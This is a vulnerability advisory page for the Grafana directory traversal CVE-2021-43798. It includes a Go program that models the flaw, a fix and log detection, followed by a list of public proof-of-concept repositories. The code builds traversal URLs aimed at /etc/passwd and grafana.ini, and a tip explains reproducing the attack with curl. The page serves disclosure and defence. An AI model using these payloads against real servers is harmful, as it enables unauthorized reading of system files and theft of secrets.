CVE-2021-43798
Description
Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) are vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: <grafana_host_url>/public/plugins/<plugin-id>/, where <plugin-id> is the plugin ID of any installed plugin. The request requires no authentication (PR:N in the CVSS vector below). At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
Severity: HIGH
CVE ID: CVE-2021-43798
CVSS Score: 7.5
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
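As an added illustration (editor's example, not Grafana's source and not any of the PoCs listed below), the Go program below models the root cause behind the advisory's URL pattern: after the plugin ID is matched against installed plugins, the rest of the path is joined onto the plugin directory and served, and filepath.Join happily resolves "../" segments out of that directory. A hardened resolver with a containment check sits beside it, together with a helper that builds the probe URL in the advisory's shape and a detection function that flags traversal attempts under /public/plugins/ in access-log URIs, including percent- and double-encoded variants. The plugin directory, the installed-plugin set, the host name and the log URIs are all constructed assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path/filepath"
	"strings"
)

// Assumed plugin directory and installed-plugin set for this illustration
// (constructed; Grafana's real layout and plugin list are not taken from the page).
const pluginsRoot = "/var/lib/grafana/plugins"

var installedPlugins = map[string]bool{"welcome": true, "alertlist": true}

var (
	errUnknownPlugin = errors.New("plugin not installed")
	errTraversal     = errors.New("requested path escapes the plugin directory")
)

// vulnerableResolve models the flaw the advisory describes: once the plugin ID
// matches an installed plugin, the remainder of /public/plugins/<plugin-id>/...
// is joined onto the plugin directory and served. filepath.Join cleans the
// result, so "../" segments simply walk out of pluginsRoot.
func vulnerableResolve(pluginID, tail string) (string, error) {
	if !installedPlugins[pluginID] {
		return "", errUnknownPlugin
	}
	return filepath.Join(pluginsRoot, pluginID, tail), nil
}

// safeResolve does the same join but rejects any result that is not inside the
// plugin's own directory. This is an illustrative containment check, not the
// patch Grafana shipped in 8.3.1.
func safeResolve(pluginID, tail string) (string, error) {
	if !installedPlugins[pluginID] {
		return "", errUnknownPlugin
	}
	pluginDir := filepath.Join(pluginsRoot, pluginID)
	candidate := filepath.Join(pluginDir, tail)
	rel, err := filepath.Rel(pluginDir, candidate)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errTraversal
	}
	return candidate, nil
}

// buildProbeURL assembles the request a PoC sends, in the shape the advisory
// gives: <grafana_host_url>/public/plugins/<plugin-id>/ followed by enough
// "../" segments to reach the filesystem root and then the target file.
func buildProbeURL(grafanaHostURL, pluginID, targetFile string, depth int) string {
	return fmt.Sprintf("%s/public/plugins/%s/%s%s",
		strings.TrimRight(grafanaHostURL, "/"), pluginID,
		strings.Repeat("../", depth), strings.TrimLeft(targetFile, "/"))
}

// isTraversalRequest is the detection side: given the request URI from an
// access log, it strips the query, percent-decodes repeatedly (to catch double
// encoding such as %252e) and flags a ".." segment under /public/plugins/.
func isTraversalRequest(rawURI string) bool {
	p := rawURI
	if q := strings.Index(p, "?"); q >= 0 {
		p = p[:q]
	}
	for i := 0; i < 3; i++ {
		decoded, err := url.PathUnescape(p)
		if err != nil || decoded == p {
			break
		}
		p = decoded
	}
	if !strings.HasPrefix(p, "/public/plugins/") {
		return false
	}
	for _, seg := range strings.Split(p, "/") {
		if seg == ".." {
			return true
		}
	}
	return false
}

func main() {
	tail := strings.Repeat("../", 8) + "etc/passwd"
	got, _ := vulnerableResolve("welcome", tail)
	fmt.Println("vulnerable handler serves:", got)
	if _, err := safeResolve("welcome", tail); err != nil {
		fmt.Println("hardened handler rejects:", err)
	}
	fmt.Println("probe:", buildProbeURL("http://grafana.example:3000", "welcome", "/etc/passwd", 8))
	// Constructed access-log URIs, not captured traffic.
	for _, uri := range []string{
		"/public/plugins/welcome/img/logo.svg",
		"/public/plugins/welcome/../../../../../../../../etc/passwd",
		"/public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/grafana/grafana.ini",
	} {
		fmt.Printf("%-70s traversal=%v\n", uri, isTraversalRequest(uri))
	}
}
```

Two practical notes. The traversal only works when the plugin ID matches an installed plugin, which is why several of the tools listed below iterate over a built-in list of plugin IDs before reading files. And when reproducing this by hand, remember that curl collapses "../" segments client-side by default; pass --path-as-is so the raw path reaches the server.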
Proof Of Concept
Nuclei Templates for CVE-2021-43798
Reference: Project Discovery GitHub
taythebot
CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth)
Reference: GitHub
zer0yu
Grafana Arbitrary File Reading Vulnerability
Reference: GitHub
jas502n
Grafana Unauthorized arbitrary file reading vulnerability
Reference: GitHub
ScorpionsMAX
CVE-2021-43798 Grafana arbitrary file read vulnerability PoC + parameters
Reference: GitHub
Mr-xn
CVE-2021-43798: Grafana arbitrary file read vulnerability
Reference: GitHub
asaotomo
Batch detection tool for the Grafana v8.* arbitrary file read vulnerability: the vulnerability is currently a 0-day; an unauthenticated attacker can exploit it to obtain sensitive files from the server.
Reference: GitHub
A-D-Team
An exploit tool for the Grafana unauthorized arbitrary file reading vulnerability (CVE-2021-43798); it can brute-force plugin IDs, extract the secret_key, and decrypt data_source info automatically.
Reference: GitHub
kenuosec
Exploits the Grafana CVE-2021-43798 arbitrary file read vulnerability: automatically detects whether the target is vulnerable and which plugins are present, extracts the secret key, decrypts the server-side DB file, and outputs data_source information.
Reference: GitHub
M0ge
Grafana CVE-2021-43798 arbitrary file read vulnerability PoC; detects by polling multiple plugins, and accepts either a single URL or URLs read from a file.
Reference: GitHub
JiuBanSec
Grafana File-Read Vuln
Reference: GitHub
lfz97
CVE-2021-43798 - Grafana arbitrary file read vulnerability
Reference: GitHub
s1gh
Reference: GitHub
z3n70
Simple program for exploiting Grafana
Reference: GitHub
Mo0ns
Grafana PoC for the arbitrary file read vulnerability (CVE-2021-43798)
Reference: GitHub
fanygit
CVE-2021-43798 exploit: multithreaded batch verification script
Reference: GitHub
LongWayHomie
CVE-2021-43798 is a vulnerability marked as High priority (CVSS 7.5) leading to arbitrary file read via installed plugins in the Grafana application.
Reference: GitHub
pedrohavay
This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).
Reference: GitHub
gixxyboy
Reference: GitHub
Ryze-T
Grafana 8.x arbitrary file read
Reference: GitHub
k3rwin
CVE-2021-43798 Grafana arbitrary file read
Reference: GitHub
gps1949
Reference: GitHub
halencarjunior
Reference: GitHub
light-Life
Grafana batch verification script written in Go, with 48 built-in checks
Reference: GitHub
rnsss
Grafana 8.x arbitrary file read
Reference: GitHub
rodpwn
Reference: GitHub
aymenbouferroum
Reference: GitHub
Jroo1053
Script to demonstrate the Grafana directory traversal exploit (CVE-2021-43798).
Reference: GitHub
yasindce1998
This repository contains files for reproducing the vulnerability.
Reference: GitHub
BJLIYANLIANG
Reference: GitHub
lalkaltest
Reference: GitHub
hupe1980
Grafana - Directory Traversal and Arbitrary File Read
Reference: GitHub
G01d3nW01f
Reference: GitHub
mauricelambert
This script implements a lab automation where I exploit CVE-2021-43798 to steal user secrets and then gain privileges on a Linux system.
Reference: GitHub
FAOG99
Exploit for Grafana CVE-2021-43798
Reference: GitHub
nuker
PoC for CVE-2021-43798 written in Python
Reference: GitHub
victorhorowitz
Reference: GitHub
katseyres2
Reference: GitHub
Iris288
Reference: GitHub
wagneralves
Directory Traversal and Arbitrary File Read on Grafana
Reference: GitHub
K3ysTr0K3R
A PoC exploit for CVE-2021-43798 - Grafana Directory Traversal
Reference: GitHub
ticofookfook
Reference: GitHub
topyagyuu
Reference: GitHub